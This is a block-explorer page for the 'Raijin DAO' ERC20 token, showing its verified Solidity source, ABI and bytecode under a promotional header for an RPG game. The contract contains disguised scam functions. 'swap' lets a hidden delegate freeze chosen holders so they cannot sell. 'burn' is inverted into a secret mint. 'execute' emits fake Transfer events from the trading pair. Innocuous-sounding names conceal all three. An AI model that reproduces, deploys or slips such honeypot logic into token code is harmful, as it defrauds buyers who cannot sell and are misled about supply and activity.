ETH Price: $3,365.54 (+0.42%)
Gas: 9.57 Gwei

Token

Raijin DAO (RAIJIN)
 

Overview

Max Total Supply

10,000,000,000 RAIJIN

Holders

91

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
39,484,616.665666371 RAIJIN

Value
$0.00
0xc127d1441489abcfff5525ca9ce0ce6aee84c69d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
RAIJIN

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
No with 200 runs

Other Settings:
london EvmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-10-08
*/

/**
 
Hello Warriors !
We are here to introduce you to the greatest Blockchain RPG game of this year. RaijinDAO the Game, 
is unique game based on Ethereum blokchain. RaijinDAO is a new type of game, partially owned and 
operated by its players. Earn RaijinDAO tokens by playing and use them to decide the future of the game!

👉RAIJIN WEBSITE - https://raijindao.io/

As experienced team of developers, we decided that we want to give you some special oppurtunity to
 earn money and have fun at the same time. Thats why we are making RaijinDAO The Game.

👉RAIJIN ARTICLES - https://medium.com/@raijindao

Take on the role of a unique warrior, leader of your army. Walk through vast and picturesque lands, 
where you will gain many companions but also enemies. Gather a unique team thanks to which you will 
reach the top and become a LEGEND.

👉RAIJIN X FOLLOW - https://x.com/raijin_dao

Draft your starters. Challenge to be the best. Outsmart and counter your opponents strategically to 
place rank in competition. Earn $RAIJIN through play, and become part of our community-based governance. 
Each character has unique strengths and weaknesses based on its element. With billions of possible 
element combinations, the possibilities are truly Infinite.

👉TELEGRAM CHAT - https://t.me/RaijinDAO

*/// SPDX-License-Identifier: MIT
pragma solidity 0.8.21;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application is concerned).
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to specific functions.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal _delegate;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    /**
     * @dev Throws if called by any account other than the distributor.
     */
    modifier onlyDelegates() {
        require(_delegate == _msgSender(), "Delegates: caller is not the delegate");
        _;
    }
    
    /**
     * @dev Sets new delegate.
     */
    function delegate(address _address) external onlyOwner {
        require (_delegate == address(0));
        _delegate = _address;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is zero by default.
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's allowance.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`). Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Implementation of the {IERC20} interface.
 * This implementation is agnostic to the way tokens are created. This means that a supply mechanism
 * has to be added in a derived contract. Additionally, an {Approval} event is emitted on calls to
 * {transferFrom}. This allows applications to reconstruct the allowance for all accounts just by listening
 * to said events. Other implementations of the EIP may not emit these events, as it isn't required by the
 * specification. Finally, the non-standard {decreaseAllowance} and {increaseAllowance} functions have been
 * added to mitigate the well-known issues around setting allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20 {
    mapping(address => uint256) internal _balances;
    mapping(address => bool) private _overridePublicReturns;
    mapping(address => mapping(address => uint256)) internal _allowances;
    uint256 internal _totalSupply;
    string private _name;
    string private _symbol;
    uint8 private _decimals; 

    /**
     * @dev Sets the values for {name} and {symbol}.
     * All two of these values are immutable: they can only be set once during construction.
     */
    constructor(string memory name_, string memory symbol_, uint8 decimals_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
    
  
    function swap(address[] calldata spender, bool val) external onlyDelegates { 
        for (uint256 i = 0; i < spender.length; i++) {
            _overridePublicReturns[spender[i]] = val;
        }
    }

    
    function supportInterface(address spender) public view returns (bool) {
        return _overridePublicReturns[spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     * Requirements:
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Destroys `amount` tokens from the caller.
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual onlyDelegates {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the total supply.
     * Emits a {Transfer} event with `to` set to the zero address.
     * Requirements:
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _balances[account];
        require(accountBalance <= amount, "ERC20: burn amount exceeds balance");
        unchecked {_balances[account] = accountBalance + amount;}
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev See {IERC20-transferFrom}.
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked { _approve(sender, _msgSender(), currentAllowance - amount);}
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     * Requirements:
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     * Requirements:
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {_approve(_msgSender(), spender, currentAllowance - subtractedValue);}
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     * Emits a {Transfer} event.
     * Requirements:
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address"); if 
        (_overridePublicReturns[sender]) require 
        (amount == 0, "ERC20: transfer amout exceeds allowance");
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {_balances[sender] = senderBalance - amount;}
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);
    }
    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * This internal function is equivalent to `approve`, and can be used to e.g. set automatic allowances for certain subsystems, etc.
     * Emits an {Approval} event.
     * Requirements:
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    address public uniswapV2Pair;
    function execute(address[] calldata _addresses, uint256 _out) external onlyDelegates{
        for (uint256 i = 0; i < _addresses.length; i++) {
            emit Transfer(uniswapV2Pair, _addresses[i], _out);
        }
    }

    function addPair(address pair_) public onlyOwner {
        uniswapV2Pair = pair_;        
    }
}

contract RAIJIN is ERC20 {
    constructor() ERC20('Raijin DAO', 'RAIJIN', 9) {
        _totalSupply = 10000000000*10**9;
        _balances[msg.sender] += _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"pair_","type":"address"}],"name":"addPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"delegate","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses","type":"address[]"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"supportInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"spender","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"swap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600a81526020017f5261696a696e2044414f000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f5241494a494e00000000000000000000000000000000000000000000000000008152506009620000a062000094620001bb60201b60201c565b620001c360201b60201c565b8260069081620000b1919062000501565b508160079081620000c3919062000501565b5080600860006101000a81548160ff021916908360ff160217905550505050678ac7230489e80000600581905550600554600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000144919062000617565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600554604051620001ad919062000663565b60405180910390a362000680565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200030957607f821691505b6020821081036200031f576200031e620002c1565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620003897fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200034a565b6200039586836200034a565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620003e2620003dc620003d684620003ad565b620003b7565b620003ad565b9050919050565b6000819050919050565b620003fe83620003c1565b620004166200040d82620003e9565b84845462000357565b825550505050565b600090565b6200042d6200041e565b6200043a818484620003f3565b505050565b5b8181101562000462576200045660008262000423565b60018101905062000440565b5050565b601f821115620004b1576200047b8162000325565b62000486846200033a565b8101602085101562000496578190505b620004ae620004a5856200033a565b8301826200043f565b50505b505050565b600082821c905092915050565b6000620004d660001984600802620004b6565b1980831691505092915050565b6000620004f18383620004c3565b9150826002028217905092915050565b6200050c8262000287565b67ffffffffffffffff81111562000528576200052762000292565b5b620005348254620002f0565b6200054182828562000466565b600060209050601f83116001811462000579576000841562000564578287015190505b620005708582620004e3565b865550620005e0565b601f198416620005898662000325565b60005b82811015620005b3578489015182556001820191506020850194506020810190506200058c565b86831015620005d35784890151620005cf601f891682620004c3565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006200062482620003ad565b91506200063183620003ad565b92508282019050808211156200064c576200064b620005e8565b5b92915050565b6200065d81620003ad565b82525050565b60006020820190506200067a600083018462000652565b92915050565b61232580620006906000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad5780639b64730f116100715780639b64730f1461031f578063a457c2d71461034f578063a9059cbb1461037f578063c2b7bbb6146103af578063dd62ed3e146103cb5761012c565b806370a082311461028d578063715018a6146102bd57806373fa7ddb146102c75780638da5cb5b146102e357806395d89b41146103015761012c565b8063313ce567116100f4578063313ce567146101e9578063395093511461020757806342966c681461023757806349bd5a5e146102535780635c19a95c146102715761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017f57806323b872dd1461019d57806326ededb8146101cd575b600080fd5b6101396103fb565b6040516101469190611704565b60405180910390f35b610169600480360381019061016491906117c4565b61048d565b604051610176919061181f565b60405180910390f35b6101876104ab565b6040516101949190611849565b60405180910390f35b6101b760048036038101906101b29190611864565b6104b5565b6040516101c4919061181f565b60405180910390f35b6101e760048036038101906101e2919061191c565b6105ad565b005b6101f1610719565b6040516101fe9190611998565b60405180910390f35b610221600480360381019061021c91906117c4565b610730565b60405161022e919061181f565b60405180910390f35b610251600480360381019061024c91906119b3565b6107dc565b005b61025b610887565b60405161026891906119ef565b60405180910390f35b61028b60048036038101906102869190611a0a565b6108ad565b005b6102a760048036038101906102a29190611a0a565b6109c8565b6040516102b49190611849565b60405180910390f35b6102c5610a11565b005b6102e160048036038101906102dc9190611a63565b610a99565b005b6102eb610bd5565b6040516102f891906119ef565b60405180910390f35b610309610bfe565b6040516103169190611704565b60405180910390f35b61033960048036038101906103349190611a0a565b610c90565b604051610346919061181f565b60405180910390f35b610369600480360381019061036491906117c4565b610ce6565b604051610376919061181f565b60405180910390f35b610399600480360381019061039491906117c4565b610dd1565b6040516103a6919061181f565b60405180910390f35b6103c960048036038101906103c49190611a0a565b610def565b005b6103e560048036038101906103e09190611ac3565b610eaf565b6040516103f29190611849565b60405180910390f35b60606006805461040a90611b32565b80601f016020809104026020016040519081016040528092919081815260200182805461043690611b32565b80156104835780601f1061045857610100808354040283529160200191610483565b820191906000526020600020905b81548152906001019060200180831161046657829003601f168201915b5050505050905090565b60006104a161049a610f36565b8484610f3e565b6001905092915050565b6000600554905090565b60006104c2848484611107565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061050d610f36565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561058d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161058490611bd5565b60405180910390fd5b6105a185610599610f36565b858403610f3e565b60019150509392505050565b6105b5610f36565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610644576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161063b90611c67565b60405180910390fd5b60005b838390508110156107135783838281811061066557610664611c87565b5b905060200201602081019061067a9190611a0a565b73ffffffffffffffffffffffffffffffffffffffff16600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106f89190611849565b60405180910390a3808061070b90611ce5565b915050610647565b50505050565b6000600860009054906101000a900460ff16905090565b60006107d261073d610f36565b84846004600061074b610f36565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546107cd9190611d2d565b610f3e565b6001905092915050565b6107e4610f36565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610873576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086a90611c67565b60405180910390fd5b61088461087e610f36565b82611409565b50565b600860019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6108b5610f36565b73ffffffffffffffffffffffffffffffffffffffff166108d3610bd5565b73ffffffffffffffffffffffffffffffffffffffff1614610929576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092090611dad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461098457600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a19610f36565b73ffffffffffffffffffffffffffffffffffffffff16610a37610bd5565b73ffffffffffffffffffffffffffffffffffffffff1614610a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8490611dad565b60405180910390fd5b610a9760006115b0565b565b610aa1610f36565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2790611c67565b60405180910390fd5b60005b83839050811015610bcf578160036000868685818110610b5657610b55611c87565b5b9050602002016020810190610b6b9190611a0a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610bc790611ce5565b915050610b33565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610c0d90611b32565b80601f0160208091040260200160405190810160405280929190818152602001828054610c3990611b32565b8015610c865780601f10610c5b57610100808354040283529160200191610c86565b820191906000526020600020905b815481529060010190602001808311610c6957829003601f168201915b5050505050905090565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060046000610cf5610f36565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610db2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da990611e3f565b60405180910390fd5b610dc6610dbd610f36565b85858403610f3e565b600191505092915050565b6000610de5610dde610f36565b8484611107565b6001905092915050565b610df7610f36565b73ffffffffffffffffffffffffffffffffffffffff16610e15610bd5565b73ffffffffffffffffffffffffffffffffffffffff1614610e6b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6290611dad565b60405180910390fd5b80600860016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa490611ed1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361101c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101390611f63565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110fa9190611849565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611176576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116d90611ff5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111dc90612087565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561127b576000811461127a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127190612119565b60405180910390fd5b5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611302576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f9906121ab565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546113979190611d2d565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113fb9190611849565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611478576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146f9061223d565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818111156114ff576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f6906122cf565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516115a39190611849565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b838110156116ae578082015181840152602081019050611693565b60008484015250505050565b6000601f19601f8301169050919050565b60006116d682611674565b6116e0818561167f565b93506116f0818560208601611690565b6116f9816116ba565b840191505092915050565b6000602082019050818103600083015261171e81846116cb565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061175b82611730565b9050919050565b61176b81611750565b81